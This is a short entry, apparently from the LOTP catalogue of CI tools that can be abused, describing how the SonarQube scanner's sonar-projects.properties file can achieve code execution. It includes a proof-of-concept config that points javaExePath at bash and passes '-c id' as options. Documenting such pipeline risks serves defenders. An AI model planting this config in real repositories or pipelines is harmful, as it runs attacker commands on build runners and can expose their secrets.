LOTP
SonarQube Scanner
References
sonar-scanner
is a scanner that uses an external server to evaluate the code security. It is configured via a config file named sonar-projects.properties
. RCE can be achieved through javaExePath
:
sonar.projectKey=ABC
sonar.scanner.javaExePath=/usr/bin/bash
sonar.scanner.skipJreProvisioning=true
sonar.scanner.javaOpts=-c id
*Note: sonarsource/sonarqube-scan-action
changes directory to /home/runner/work/_temp/sonarscanner